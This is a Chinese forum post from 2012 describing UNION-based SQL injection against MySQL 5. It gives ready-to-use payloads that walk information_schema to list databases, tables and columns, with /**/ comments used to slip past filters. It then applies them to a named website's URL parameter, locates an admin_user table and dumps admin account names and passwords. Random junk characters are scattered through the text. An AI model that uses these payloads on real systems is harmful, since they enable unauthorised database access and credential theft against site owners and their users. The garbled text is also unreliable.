查库
* P& Z8 |6 t' A+ B2 o" W: Z% o+ |. r! H/ [* t; _/ t
id=-1 union select 1,..,SCHEMA_NAME,n from/**/information_schema.SCHEMATA limit 1,1/*- }" G8 d: e- |( p u* c
6 `; Z5 J( j: ]# @. e4 R
查表
. P/ S8 i: |0 T6 y% H$ [8 a* N* i
id=-1/**/union/**/select/**/1,TABLE_NAME,N/**/from/**/information_schema.TABLES/**/where/**/TABLE_SCHEMA=库的HEX值/**/limit/**/1,1
, }9 w$ w; K- k: M. b; G
( S+ B3 Q3 U) X查段2 @" e% J$ m, E2 x. y3 n/ ^
6 C; r! X* @1 J
id=-1/**/union/**/select/**/1,COLUMN_NAME,N/**/from/**/information_schema.COLUMNS/**/where/**/TABLE_NAME=表的HEX值/**/limit/**/1,1. P, C! U9 F+ q! N) `3 F
/ h! t+ R' {/ Z+ r( g4 M' \
* |5 t0 F+ ~3 h7 a) V {4 F7 Imysql5高级注入方法暴表
& o- q2 i; |5 I
5 v( n' x$ q8 z4 _6 x @; w* A例子如下:6 f0 H' d$ c$ Y j
3 d0 w U* S! h, D) x. i2 h1.爆表
& r' [4 R% j$ s$ M6 c) ]9 khttp://www.political-security.com/ccaus_content.php?ccausid=13240/**/and/**/1=2/**/union/**/select/**/1,2,3,TABLE_NAME,5/**/From/**/information_schema.TABLES/**/Where/**/TABLE_SCHEMA=0x79645F7465616D6E6574/**/limit/**/0,1/* (0x79645F7465616D6E6574为数据库名的16进制转换yd_teamnet)
2 ~6 _/ ^0 f+ F' T这样爆到第4个时出现了admin_user表。
$ x2 d+ U6 Y) |0 v& b. u/ C+ }
$ D5 \3 I( Y+ ~6 j& j3 W$ v2.暴字段
7 J2 }8 y3 V6 E& U' \; i: D T, mhttp://www.political-security.com/ccaus_content.php?ccausid=13240/**/and/**/1=2/**/union/**/select/**/1,2,3,COLUMN_NAME,5/**/From/**/information_schema.COLUMNS/**/Where/**/TABLE_NAME=0x61646D696E5F75736572/**/And/**/TABLE_SCHEMA=0x79645F7465616D6E6574/**/limit/**/0,1/*7 B+ q, Y, n, X; N# H+ s) s0 S: p
/ g' o8 l% k ?! y: N- h! w, p/ `
7 B) I, k! y6 e# x
3.爆密码 J4 g( o G, u0 a
http://www.political-security.com/ccaus_content.php?ccausid=13240/**/and/**/1=2/**/union/**/select/**/1,2,3,concat(0x7c,ID,0x7c,ACCOUNT,0x7c,PASSWORD,0x7c),5/**/From/**/admin_user/**/limit/**/0,1/*
/ s# ^. J8 r3 Y& ~* [
" n4 t, ]8 |) H
, j- E0 M S* f" C0 C+ v |
发表于 2012-9-13 16:29:37
收藏
支持
反对